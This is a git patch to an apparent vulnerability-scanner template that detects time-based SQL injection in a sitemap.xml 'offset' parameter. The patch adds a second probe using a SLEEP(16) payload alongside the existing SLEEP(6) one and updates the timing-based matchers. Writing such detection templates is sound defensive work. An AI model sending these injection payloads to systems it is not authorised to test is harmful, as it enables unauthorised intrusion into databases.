From a068bf6283d96cac2808363ab4d2b18642224aad Mon Sep 17 00:00:00 2001
From: J4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Sun, 9 Jul 2023 16:17:26 +0800
Subject: [PATCH] Update sitemap-sql-injection.yaml

---
 .../other/sitemap-sql-injection.yaml          | 21 +++++++++++++++----
 1 file changed, 17 insertions(+), 4 deletions(-)

diff --git a/http/vulnerabilities/other/sitemap-sql-injection.yaml b/http/vulnerabilities/other/sitemap-sql-injection.yaml
index 72d02f42b5..7a4517f53d 100644
--- a/http/vulnerabilities/other/sitemap-sql-injection.yaml
+++ b/http/vulnerabilities/other/sitemap-sql-injection.yaml
@@ -2,7 +2,7 @@ id: sitemap-sql-injection
 
 info:
   name: Sitemap - SQL Injection
-  author: Aravind
+  author: Aravind,j4vaovo
   severity: high
   reference: https://twitter.com/GodfatherOrwa/status/1647406811216072705?t=fbn0Eu34euKdrn4fL8UqfQ&s=19
   metadata:
@@ -17,10 +17,23 @@ http:
         POST /sitemap.xml?offset=1;SELECT IF((SLEEP(6)),1,2356)# HTTP/1.1
         Host: {{Hostname}}
 
+      - |
+        @timeout: 25s
+        POST /sitemap.xml?offset=1;SELECT IF((SLEEP(16)),1,2356)# HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
-          - 'duration>=6'
-          - 'status_code == 200'
-          - 'contains(header, "application/xml") && contains(body, "sitemap>")'
+          - 'duration_1>=6'
+          - 'status_code_1 == 200'
+          - 'contains(body_1, "sitemap>")'
+        condition: and
+
+      - type: dsl
+        dsl:
+          - 'duration_2>=16'
+          - 'status_code_2 == 200'
+          - 'contains(body_2, "sitemap>")'
         condition: and